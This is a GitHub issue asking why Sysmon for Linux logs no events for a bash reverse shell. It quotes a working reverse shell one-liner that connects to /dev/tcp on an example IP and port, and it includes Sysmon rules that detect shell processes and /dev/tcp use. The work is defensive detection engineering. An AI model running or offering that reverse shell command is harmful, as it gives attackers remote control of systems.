
Limited logging scope CommandLine attribute

Open vivami opened this issue 3 years ago • 0 comments

Description

I'm trying to detect the following basic bash reverse shell: `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`. I have the following Sysmon rules enabled:

    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Rule name="TechniqueID=T1059.004,TechniqueName=Command and Scripting Interpreter: Unix Shell" groupRelation="or">
          <Image condition="end with">/bin/bash</Image>
          <Image condition="end with">/bin/dash</Image>
          <Image condition="end with">/bin/sh</Image>
        </Rule>
        <Rule name="TechniqueID=T1059.004,TechniqueName=Command and Scripting Interpreter: Reverse interpreter shell" groupRelation="or">
          <CommandLine condition="contains">/dev/tcp</CommandLine>
          <CommandLine condition="contains">/dev/udp</CommandLine>
        </Rule>
      </ProcessCreate>
    </RuleGroup>

Sysmon is not generating any events (in /var/log/syslog) and I'm not able to capture this reverse shell execution.

Expected result

I would expect Sysmon to generate an event containing `<Data Name="CommandLine">-i >& /dev/tcp/10.0.0.1/4242 0>&1</Data>`.

Is this a known limitation, or am I not using the correct configuration?

vivami, Dec 31 '21 09:12